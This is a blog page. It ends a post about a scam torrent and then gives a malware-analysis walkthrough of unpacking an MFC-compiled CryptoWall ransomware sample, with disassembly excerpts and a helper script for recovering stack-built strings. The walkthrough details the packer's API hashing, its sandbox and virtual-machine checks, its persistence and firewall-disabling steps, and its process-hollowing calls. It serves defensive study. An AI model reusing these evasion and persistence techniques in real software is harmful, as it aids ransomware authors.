<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsb40j_jaS0yIeQzg74f9Syt4XpvyVR8AWk-zX8xZAKYbUPMaKZOSHxeogRiLXlr3e6BkphW_H5cquubia4Bk08VN3OKXCW79Ahb2RHkMhSI2ozzDiWFWy8QhvDnN1C7JJLoH-yfl4wKk/s1600/pirate2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="333" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsb40j_jaS0yIeQzg74f9Syt4XpvyVR8AWk-zX8xZAKYbUPMaKZOSHxeogRiLXlr3e6BkphW_H5cquubia4Bk08VN3OKXCW79Ahb2RHkMhSI2ozzDiWFWy8QhvDnN1C7JJLoH-yfl4wKk/s400/pirate2.png" width="400" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif;">Downloading the torrent and leeching it shows the following files to be downloaded.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUxvUFPa24WtJ7rFeHoa7gwkuLSOrSNMr3jEpBi5R-fKarre56LyZ5XkbKxR065Osbn0tYV2lPT8tb7-B_4KgbZ5S6mC3IRTbGBfLEJJVhYL1kJ7S42nIm5SnsnZ7HJ0UFJxofQXrBCds/s1600/pirate3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUxvUFPa24WtJ7rFeHoa7gwkuLSOrSNMr3jEpBi5R-fKarre56LyZ5XkbKxR065Osbn0tYV2lPT8tb7-B_4KgbZ5S6mC3IRTbGBfLEJJVhYL1kJ7S42nIm5SnsnZ7HJ0UFJxofQXrBCds/s400/pirate3.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">The movie is RAR-compressed and password protected. Included in the package is a README.txt that contains the following.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAL3DKop2UkGy8fU0z1td1OWsEoQm0FYZPIPU3Q_55QMxL21p0wFGiaxrb4rrSkjScz-OfnBNxhRdk5TRIbm_pnJ4hGCoimuycLbAqQsMajpU3kdhT5jiY-kF-O7eiWLL-nsp3ARjIYs/s1600/pirate4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAL3DKop2UkGy8fU0z1td1OWsEoQm0FYZPIPU3Q_55QMxL21p0wFGiaxrb4rrSkjScz-OfnBNxhRdk5TRIbm_pnJ4hGCoimuycLbAqQsMajpU3kdhT5jiY-kF-O7eiWLL-nsp3ARjIYs/s400/pirate4.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Following the link that supposedly provides the password redirects to this site.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNP7vLCsEYkrts-4dAFse7CefPXKmHYs6AxDfrYqWqNRAGKQXMGtADmhz0J7NQSif73FzX1i2N3viqa2tpwR-dK03N1WOJP1tTbdN6ZXPtKP4dGAO9RSqGv-Q8S-9zLs0A6Yl9gxTkcqE/s1600/pirate5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNP7vLCsEYkrts-4dAFse7CefPXKmHYs6AxDfrYqWqNRAGKQXMGtADmhz0J7NQSif73FzX1i2N3viqa2tpwR-dK03N1WOJP1tTbdN6ZXPtKP4dGAO9RSqGv-Q8S-9zLs0A6Yl9gxTkcqE/s400/pirate5.png" width="400" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">A very obvious scam. I didn't bother going through the rest of the scam process.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
Posted by Unknown.<br />
<h2 style="text-align: left;">
Unpacking MFC Compiled CryptoWall Malware</h2>
Posted 2015-03-30.<br />
<h4 style="text-align: left;">
Introduction</h4>
<div style="text-align: left;">
First and foremost, this article does not intend to analyze what CryptoWall malware is (many malware researchers have done that already); instead, this analysis focuses on unpacking MFC-compiled CryptoWall.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
You can also download the MFC tutorial by Externalist from https://tuts4you.com/download.php?view.2509 for additional reference.<br />
<br />
I used IDA Pro and OllyDbg hand in hand while debugging to get a better overview of the malware during unpacking.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<h4 style="text-align: left;">
What is MFC?</h4>
<div style="text-align: left;">
MFC, or Microsoft Foundation Classes, is a collection of C++ classes commonly used in object-oriented Windows programming. Think of MFC as a C++ wrapper around the Windows API.</div>
<div style="text-align: left;">
<br /></div>
<h4 style="text-align: left;">
So, why MFC?</h4>
<div style="text-align: left;">
Since MFC wraps the Windows API, the Windows API calls familiar to us malware researchers are hidden inside the MFC library, which makes static analysis of malware such as CryptoWall quite difficult.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Here is what the imports of an MFC-compiled file look like:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbIHpq39J2W-ao-PvGx7z3nl6nSRPg5nLD8gyfyB4W8kK83sco5bsQ97AtFctKoJmX07WAyC_BPJ6MSFppSswVZVnbnEpQA2blTvMUw2jvHfUhl9JPuAzUp4t3w89jD61_LX6mJ8vG/s1600/MFC_imports.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbIHpq39J2W-ao-PvGx7z3nl6nSRPg5nLD8gyfyB4W8kK83sco5bsQ97AtFctKoJmX07WAyC_BPJ6MSFppSswVZVnbnEpQA2blTvMUw2jvHfUhl9JPuAzUp4t3w89jD61_LX6mJ8vG/s1600/MFC_imports.png" height="320" width="227" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<i>Imports of MFC42.DLL</i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Woah!! No string names at all? Only ordinals? Don't fret, we can still continue to analyze this file.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
If you have IDA Pro installed, it will automatically load the corresponding library for you making the import names for MFC42.dll visible.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpaGg3ZBhFhURXJ2OuIyEFKRkzsglNertG_8lv_7ovtusqGLmBxClWGi1m_SR9CEd5i2jxiqFNuCaRrXZwidSl79Oi6Tdh-Jss7kxR7jxoqmv1QybjtLYfjwK4Oe2KUvM_3g6tULza/s1600/ida_mfc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpaGg3ZBhFhURXJ2OuIyEFKRkzsglNertG_8lv_7ovtusqGLmBxClWGi1m_SR9CEd5i2jxiqFNuCaRrXZwidSl79Oi6Tdh-Jss7kxR7jxoqmv1QybjtLYfjwK4Oe2KUvM_3g6tULza/s1600/ida_mfc.png" height="189" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<h4 style="text-align: left;">
Let's begin..</h4>
<div style="text-align: left;">
First, let's take a look at the WINMAIN of our sample (<i>9DB8BE981E9CDFCB583030E0057345AB</i>)</div>
<div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvFBfA3O7a9dLMI5W4hggbANkAtaGhMeqKqREqJ9IUEr_JEh00G_KfFK04rHA428JHRV_2s__zO-UMfnPgdd6yHPHLbpD_lPYyW0vobQF_o6D16pKi_mkKbwLbBF17KKId5Q7YWSBO/s1600/mfcwinmain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvFBfA3O7a9dLMI5W4hggbANkAtaGhMeqKqREqJ9IUEr_JEh00G_KfFK04rHA428JHRV_2s__zO-UMfnPgdd6yHPHLbpD_lPYyW0vobQF_o6D16pKi_mkKbwLbBF17KKId5Q7YWSBO/s1600/mfcwinmain.png" height="133" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Following the MFC call instruction leads us to a dead-end. So what now?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Based on experience, I know that packed malware will attempt to reconstruct its imports from kernel32.dll at some point. So from there, let's load it in OllyDbg and put a breakpoint on LoadLibraryA. Press F9 (run) a couple of times until a familiar "kernel32.dll" string with an address within the scope of our file is visible on the stack.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZdLGHgubRUM_vw7bOHu2_Ois-kQBwfiyOWdNY9zYdzdHQOu9t9uAhmJJ1t7-zfGuGhl3VpPglKWqlR30w21dHgm2FHfn265N_UOOcsGykFLaSDwqVMRqN0se_djH2MfEuUlL6uoA_/s1600/kernel32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZdLGHgubRUM_vw7bOHu2_Ois-kQBwfiyOWdNY9zYdzdHQOu9t9uAhmJJ1t7-zfGuGhl3VpPglKWqlR30w21dHgm2FHfn265N_UOOcsGykFLaSDwqVMRqN0se_djH2MfEuUlL6uoA_/s1600/kernel32.png" height="155" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Press Alt+F9 to return to user code, then trace from there and let's look for a decryption routine.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I found the decryption routine at </div>
<blockquote class="tr_bq">
<span style="background-color: white;"><span style="color: blue;"><i>.text:00401370 push esi ;<br />.text:00401371 mov esi, ecx<br />.text:00401373 call READ_TO_MEM ;<br />.text:00401378 push 54638<br />.text:0040137D mov ecx, esi<br /><b>.text:0040137F call DECRYPT_FUNC</b></i></span></span></blockquote>
<div class="separator" style="clear: both; text-align: left;">
where it first reads a portion of itself to higher memory (<i>Function@00401373</i>) and then decrypts a size of 0x434Ah.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh87o-T5WMJ2jGzDOAJYLwCaOgC8oALqlcbDwIoKHTxNQkfXffReGoUDTvRNYXqQ_Z3edhgJaldlbgZkenNu_Q01qiS4d41wHQaxlvOnt0TLFNYwpMClgCaUPO4lGJhvRqZmvTmBrAw/s1600/decrypted1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh87o-T5WMJ2jGzDOAJYLwCaOgC8oALqlcbDwIoKHTxNQkfXffReGoUDTvRNYXqQ_Z3edhgJaldlbgZkenNu_Q01qiS4d41wHQaxlvOnt0TLFNYwpMClgCaUPO4lGJhvRqZmvTmBrAw/s1600/decrypted1.png" height="279" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Take note of the memory location because execution will be transferred from there.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In this case, the memory location is 00980228; let's call this the UNPACKED01 function.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAdAZkMNPG5fj12xGl8FsGxjVdZpo2Td8ONqTP7cRWH92EC1guGUS-x0HNM5VoiiQ4UHPikbkJJZv1S8dKxt97HULsF0Jums7qIzrUqp-xLIkxsg-2lNTay9zpY85QC3lxubrBsu_Y/s1600/unpacked01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAdAZkMNPG5fj12xGl8FsGxjVdZpo2Td8ONqTP7cRWH92EC1guGUS-x0HNM5VoiiQ4UHPikbkJJZv1S8dKxt97HULsF0Jums7qIzrUqp-xLIkxsg-2lNTay9zpY85QC3lxubrBsu_Y/s1600/unpacked01.png" height="105" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Typical of packers, it will attempt to rebuild its Import Address Table by preparing the Windows API name strings and then using the LoadLibrary and GetProcAddress combo.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In this example, the packer builds its strings directly on the stack as a form of obfuscation, so they are not readily visible to the researcher's naked eye.</div>
<blockquote class="tr_bq">
<i><span style="color: blue;">debug029:0098047F mov byte ptr [ebp-20h], 'k'<br />debug029:00980483 mov byte ptr [ebp-1Fh], 'e'<br />debug029:00980487 mov byte ptr [ebp-1Eh], 'r'<br />debug029:0098048B mov byte ptr [ebp-1Dh], 'n'<br />debug029:0098048F mov byte ptr [ebp-1Ch], 'e'<br />debug029:00980493 mov byte ptr [ebp-1Bh], 'l'<br />debug029:00980497 mov byte ptr [ebp-1Ah], '3'<br />debug029:0098049B mov byte ptr [ebp-19h], '2'<br />debug029:0098049F mov byte ptr [ebp-18h], '.'<br />debug029:009804A3 mov byte ptr [ebp-17h], 'd'<br />debug029:009804A7 mov byte ptr [ebp-16h], 'l'<br />debug029:009804AB mov byte ptr [ebp-15h], 'l'<br />debug029:009804AF mov [ebp-14h], bl<br />debug029:009804B2 mov byte ptr [ebp-0A0h], 'G'<br />debug029:009804B9 mov byte ptr [ebp-9Fh], 'e'<br />debug029:009804C0 mov byte ptr [ebp-9Eh], 't'<br />debug029:009804C7 mov byte ptr [ebp-9Dh], 'M'<br />debug029:009804CE mov byte ptr [ebp-9Ch], 'o'<br />debug029:009804D5 mov byte ptr [ebp-9Bh], 'd'<br />debug029:009804DC mov byte ptr [ebp-9Ah], 'u'<br />debug029:009804E3 mov byte ptr [ebp-99h], 'l'<br />debug029:009804EA mov byte ptr [ebp-98h], 'e'<br />debug029:009804F1 mov byte ptr [ebp-97h], 'F'<br />debug029:009804F8 mov byte ptr [ebp-96h], 'i'<br />debug029:009804FF mov byte ptr [ebp-95h], 'l'<br />debug029:00980506 mov byte ptr [ebp-94h], 'e'<br />debug029:0098050D mov byte ptr [ebp-93h], 'N'<br />debug029:00980514 mov byte ptr [ebp-92h], 'a'<br />debug029:0098051B mov byte ptr [ebp-91h], 'm'<br />debug029:00980522 mov byte ptr [ebp-90h], 'e'<br />debug029:00980529 mov byte ptr [ebp-8Fh], 'W'<br />debug029:00980530 mov [ebp-8Eh], bl</span></i> </blockquote>
The strings used are listed below.<br />
<br />
<ul>
<li>kernel32.dll</li>
<li>GetModuleFileNameW</li>
<li>CreateFileA</li>
<li>VirtualAlloc</li>
<li>GetFileSize</li>
<li>ReadFile</li>
<li>CloseHandle</li>
<li>myapp.exe</li>
<li>GetSystemDirectoryA</li>
<li>explorer.exe</li>
</ul>
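<div style="text-align: left;">
One way to recover such stack-built strings automatically, as an added example that is not part of the original post: the script below parses IDA-style <i>mov byte ptr [ebp-XXh], 'c'</i> lines (the listing above is embedded as the sample input), groups the stores by contiguous stack offset, and splits at the zero store. It assumes, as the listing implies, that the register stored at the end of each string (<i>bl</i>) holds 0.</div>

```python
import re
from typing import Dict, List

# IDA-style stack stores, e.g.
#   debug029:0098047F mov byte ptr [ebp-20h], 'k'
#   debug029:009804AF mov [ebp-14h], bl
# group 1 = hex displacement, group 2 = character literal, group 3 = register
STACK_STORE = re.compile(
    r"mov\s+(?:byte ptr\s+)?\[ebp-([0-9A-Fa-f]+)h\],\s*(?:'(.)'|([a-z]{2,3}))"
)

# Sample input: the listing from the UNPACKED01 function shown in the post.
LISTING = """
debug029:0098047F mov byte ptr [ebp-20h], 'k'
debug029:00980483 mov byte ptr [ebp-1Fh], 'e'
debug029:00980487 mov byte ptr [ebp-1Eh], 'r'
debug029:0098048B mov byte ptr [ebp-1Dh], 'n'
debug029:0098048F mov byte ptr [ebp-1Ch], 'e'
debug029:00980493 mov byte ptr [ebp-1Bh], 'l'
debug029:00980497 mov byte ptr [ebp-1Ah], '3'
debug029:0098049B mov byte ptr [ebp-19h], '2'
debug029:0098049F mov byte ptr [ebp-18h], '.'
debug029:009804A3 mov byte ptr [ebp-17h], 'd'
debug029:009804A7 mov byte ptr [ebp-16h], 'l'
debug029:009804AB mov byte ptr [ebp-15h], 'l'
debug029:009804AF mov [ebp-14h], bl
debug029:009804B2 mov byte ptr [ebp-0A0h], 'G'
debug029:009804B9 mov byte ptr [ebp-9Fh], 'e'
debug029:009804C0 mov byte ptr [ebp-9Eh], 't'
debug029:009804C7 mov byte ptr [ebp-9Dh], 'M'
debug029:009804CE mov byte ptr [ebp-9Ch], 'o'
debug029:009804D5 mov byte ptr [ebp-9Bh], 'd'
debug029:009804DC mov byte ptr [ebp-9Ah], 'u'
debug029:009804E3 mov byte ptr [ebp-99h], 'l'
debug029:009804EA mov byte ptr [ebp-98h], 'e'
debug029:009804F1 mov byte ptr [ebp-97h], 'F'
debug029:009804F8 mov byte ptr [ebp-96h], 'i'
debug029:009804FF mov byte ptr [ebp-95h], 'l'
debug029:00980506 mov byte ptr [ebp-94h], 'e'
debug029:0098050D mov byte ptr [ebp-93h], 'N'
debug029:00980514 mov byte ptr [ebp-92h], 'a'
debug029:0098051B mov byte ptr [ebp-91h], 'm'
debug029:00980522 mov byte ptr [ebp-90h], 'e'
debug029:00980529 mov byte ptr [ebp-8Fh], 'W'
debug029:00980530 mov [ebp-8Eh], bl
"""


def recover_stack_strings(listing: str, zero_reg: str = "bl") -> List[str]:
    """Rebuild strings a packer assembles one byte at a time on the stack.

    Every store writes one character to [ebp-N]. Characters are grouped by
    contiguous, increasing stack address; a store of `zero_reg` (assumed to
    hold 0, as in the post's listing) or a gap in the addresses ends a string.
    Strings are returned in ascending stack-address order.
    """
    cells: Dict[int, str] = {}
    for line in listing.splitlines():
        m = STACK_STORE.search(line)
        if not m:
            continue
        addr = -int(m.group(1), 16)          # [ebp-20h] sits below [ebp-1Fh]
        if m.group(3) is not None:
            if m.group(3) != zero_reg:
                continue                     # some other register: not a NUL
            cells[addr] = "\0"
        else:
            cells[addr] = m.group(2)

    strings: List[str] = []
    current = ""
    prev = None
    for addr in sorted(cells):
        ch = cells[addr]
        if prev is not None and addr != prev + 1 and current:
            strings.append(current)          # gap between stores: new string
            current = ""
        if ch == "\0":
            if current:
                strings.append(current)
            current = ""
        else:
            current += ch
        prev = addr
    if current:
        strings.append(current)
    return strings


if __name__ == "__main__":
    for s in recover_stack_strings(LISTING):
        print(s)
```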
<br />
<div class="separator" style="clear: both; text-align: left;">
It then resolves the addresses of LoadLibraryA and GetProcAddress in kernel32.dll. An interesting note here is that you will never see the string "LoadLibraryA" or "GetProcAddress" assembled on the stack or anywhere in memory. This is because the packer uses its <b>own hashing algorithm</b>, with the string hashes of LoadLibraryA, GetProcAddress and kernel32.dll already precomputed.</div>
<blockquote class="tr_bq">
<span style="color: blue;"><i>debug029:00980263 nop<br />debug029:00980264 push 0D5786h ; hash of "LoadLibraryA"<br />debug029:00980269 push 0D4E88h ; hash of "kernel32.dll"<br /><b>debug029:0098026E call UNHASHER</b><br /><b>debug029:00980273 mov [ebp-4], eax ; EAX = kernel32.dll:kernel32_LoadLibraryA</b><br />debug029:00980276 push 348BFAh ; hash of "GetProcAddress"<br />debug029:0098027B push 0D4E88h </i></span><i style="color: blue;">; hash of "kernel32.dll"</i><span style="color: blue;"><i><br /><b>debug029:00980280 call UNHASHER</b><br /><b>debug029:00980285 mov [ebp-8], eax ; EAX = kernel32.dll:kernel32_GetProcAddress</b></i></span></blockquote>
It will then check for the existence of the file "%systemdrive%:\myapp.exe" (C:\myapp.exe) or "%windir%\explorer.exe.\" (C:\Windows\explorer.exe.\). If either exists, the malware goes into an infinite loop and system infection is bypassed; you may also see 100% CPU utilization by the malware process. The malware authors may have added this check so that their own systems are not infected while writing and testing the code.<br />
<br />
This function may have been copied over from a known malware family called <b>"<i>Soraya"</i> </b>in which the malware terminates and discontinues system infection when the file C:\myapp.exe exists. But in this case, instead of terminating, it goes into an infinite loop.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
It will then allocate another memory region using VirtualAlloc, copy itself yet again into the allocated memory, and then look for a <b>dword marker</b> to determine the offset at which to start decrypting.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The dword marker is known to be <b>0xA2658111 </b>in this sample.</div>
<blockquote class="tr_bq">
<i><span style="color: blue;">009809AA C685 34FFFFFF A2 MOV BYTE PTR SS:[EBP-CC],<b>0A2</b><br />009809B1 C685 35FFFFFF 65 MOV BYTE PTR SS:[EBP-CB],<b>65</b><br />009809B8 C685 36FFFFFF 81 MOV BYTE PTR SS:[EBP-CA],<b>81</b><br />009809BF C685 37FFFFFF 11 MOV BYTE PTR SS:[EBP-C9],<b>11</b></span></i></blockquote>
<br />
Once found, it will decrypt 0x3AACh bytes starting at +0x14h from the marker offset. The decrypted code is then copied once more to a newly allocated memory region, and execution is transferred to the decrypted code afterwards.<br />
<br />
From here, we have successfully unpacked the <b><i>first layer</i></b> of cryptowall.<br />
<br />
<br />
<h4>
But wait, there's more...</h4>
<div>
If you think we are done, you are mistaken, my friend. There is one more layer to unpack in order to get to the real CryptoWall code.</div>
<div>
<br /></div>
<div>
So let's get started :)</div>
<div>
<br /></div>
<div>
Here is a preview of what the next stage of code looks like:<br />
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfoE_1wnHKgK9fBeejcsxyZERlLVnQ5RodhgNyscdaPv6WVc_zE_h9Cc1QCF8XqSiGiRnw1I4uhT8koGaDTQlcpkIClLMEXaWAoKgAcXj4m_7dRdZQAcpkeStASD4KqJSpoMNK-30G/s1600/code2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfoE_1wnHKgK9fBeejcsxyZERlLVnQ5RodhgNyscdaPv6WVc_zE_h9Cc1QCF8XqSiGiRnw1I4uhT8koGaDTQlcpkIClLMEXaWAoKgAcXj4m_7dRdZQAcpkeStASD4KqJSpoMNK-30G/s1600/code2.png" height="92" width="320" /></a></div>
<br />
The CRYPTO_UNPACK2 function has 8 options in total, selected by the value pushed on the stack before it is called.<br />
<br />
These options are:<br />
<br />
<ul>
<li>0 = Exit process</li>
<li>1 = Unpack compressed data to allocated memory</li>
<li>4 = Verify privileges and create mutex "UACMut"</li>
<li>5 = Check for existence of sbiedll.dll module (Sandboxie) in running processes </li>
<li>6 = Check for existence of VBoxService.exe and vmtoolsd.exe in running processes</li>
<li>7 = Run unpacked cryptowall in memory.</li>
<li>8 = Copy itself as system.pif to %ALLUSERSPROFILE%\Start Menu\Programs\Startup and to %USERPROFILE%\Application Data with hidden and system attributes, create REGRUN entries, and optionally disable the firewall service</li>
<li>9 = Traverse the registry to find the default web browser application; also checks whether iexplorer.exe is 32-bit (the 64-bit version is skipped)</li>
</ul>
<div>
Note that there are no options 2 and 3.</div>
<div>
<br /></div>
<div>
To summarize it, the typical execution sequence for this malware is the following:</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<span style="color: blue;"><i>Push 1 - Call CRYPTO_UNPACK2<br />|- Push 6 - Call CRYPTO_UNPACK2<br /> |- Push 5 - Call CRYPTO_UNPACK2<br /> |- Push 4 - Call CRYPTO_UNPACK2<br /> |- Push 8 - Call CRYPTO_UNPACK2<br /> |- Push 7 - Call CRYPTO_UNPACK2 (Spawn unpacked cryptowall as process)<br />Push 0 - Call CRYPTO_UNPACK2 (Exit Process)</i></span></blockquote>
</div>
<div>
At the start of the CRYPTO_UNPACK2 function, it reconstructs its strings and the Windows APIs it needs with the same method used previously.</div>
<div>
<br /></div>
<div>
For reference, here is the list of strings that will be populated in stack.</div>
<ul>
<li>kernel32.dll</li>
<li>shell32.dll</li>
<li>advapi32.dll</li>
<li>GetProcAddress</li>
<li>CreateProcessA</li>
<li>CreateProcessW</li>
<li>CreateToolhelp32Snapshot</li>
<li>Process32First</li>
<li>Process32Next</li>
<li>Module32First</li>
<li>Module32Next</li>
<li>CloseHandle</li>
<li>GetCurrentProcess</li>
<li>GlobalAlloc</li>
<li>OpenProcessToken</li>
<li>GetTokenInformation</li>
<li>AllocateAndInitializeSid</li>
<li>EqualSid</li>
<li>LookupAccountSid</li>
<li>OpenMutexA</li>
<li>CreateMutexA</li>
<li>CreateFileA</li>
<li>CreateFileW</li>
<li>GetFileSize</li>
<li>ReadFile</li>
<li>GetSystemDirectoryA</li>
<li>GetSystemDirectoryW</li>
<li>SetFileAttributesW</li>
<li>SHGetSpecialFolderPathW</li>
<li>RegOpenKeyExA</li>
<li>RegOpenKeyExW</li>
<li>RegSetValueExA</li>
<li>RegSetValueExW</li>
<li>RegQueryValueExA</li>
<li>RegQueryValueExW</li>
<li>RegCloseKey</li>
<li>CreateDirectoryW</li>
<li>ExitProcess</li>
<li>Sleep</li>
<li>GetFileTime</li>
<li>SetFileTime</li>
<li>CopyFileW</li>
<li>VirtualAlloc</li>
<li>GetTickCount</li>
<li>IsWow64Process</li>
<li>OpenProcess</li>
<li>DuplicateHandle</li>
<li>NtUnmapViewOfSection</li>
<li>VirtualAllocEx</li>
<li>WriteProcessMemory</li>
<li>GetThreadContext</li>
<li>SetThreadContext</li>
<li>ResumeThread</li>
<li>VirtualProtectEx</li>
<li>TerminateProcess</li>
<li>NTReadVirtualMemory</li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
Looking back at the execution sequence posted above, <i style="color: blue;">Push 1 - Call CRYPTO_UNPACK2 </i>decrypts more of its encrypted data, not surprisingly with the same procedure used on the first layer.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It will check (again) for a dword marker in its encrypted data in order to get the offset where to start the decryption routine. This time the <b>dword marker is 0x34E812AEh.</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<blockquote class="tr_bq">
<i><span style="color: blue;">debug031:013C2795 _looForMarker: ;<br /><b>debug031:013C2795 cmp byte ptr [ecx+edi], 34h ; Compare Two Operands</b><br />debug031:013C2799 jnz short _notMarker ; Jump if Not Zero (ZF=0)<br /><b>debug031:013C279B cmp byte ptr [ecx+edi+1], 0E8h ; Compare Two Operands</b><br />debug031:013C27A0 jnz short _notMarker ; Jump if Not Zero (ZF=0)<br /><b>debug031:013C27A2 cmp byte ptr [ecx+edi+2], 12h ; Compare Two Operands</b><br />debug031:013C27A7 jnz short _notMarker ; Jump if Not Zero (ZF=0)<br /><b>debug031:013C27A9 cmp byte ptr [ecx+edi+3], 0AEh ; Compare Two Operands</b><br />debug031:013C27AE jnz short _notMarker ; Jump if Not Zero (ZF=0)<br />debug031:013C27B0 cmp [ebp+arg_0], ebx ; Compare Two Operands<br />debug031:013C27B3 jnz short loc_13C27BD ; Jump if Not Zero (ZF=0)<br />debug031:013C27B5 lea edx, [ecx+4] ;<br />debug031:013C27BB jmp short _notMarker ; </span></i></blockquote>
When the marker is found, it calls its decryption routine to decrypt another chunk of data.<br />
Voilà!! It's another MZ-PE file (why am I not surprised?). This new Win32 file is the <b>REAL</b> CryptoWall malware. You can dump it from OllyDbg if you want a local copy.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJt5T45igUBCFRtbZN-SIcYsfy7W0OV40C9R_Krzt8v3QsuyRnqgQfW5npW9DYsa237O4PkQumSnCvlyPukQOAfSNZd4ZYBwhUMeu4nAns40nJtoGLjgaPP8N0oQ_EcVfpw37kuZmJ/s1600/cryptodump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJt5T45igUBCFRtbZN-SIcYsfy7W0OV40C9R_Krzt8v3QsuyRnqgQfW5npW9DYsa237O4PkQumSnCvlyPukQOAfSNZd4ZYBwhUMeu4nAns40nJtoGLjgaPP8N0oQ_EcVfpw37kuZmJ/s1600/cryptodump.png" height="231" width="320" /></a></div>
<br /></div>
<div>
It will then check whether it is being run under a specific environment (Sandboxie, VBoxService or VMware) and, if so, force-exits. (<i style="color: blue;">Push 6 - Call CRYPTO_UNPACK2, </i><i style="color: blue;">Push 5 - Call CRYPTO_UNPACK2)</i></div>
<div>
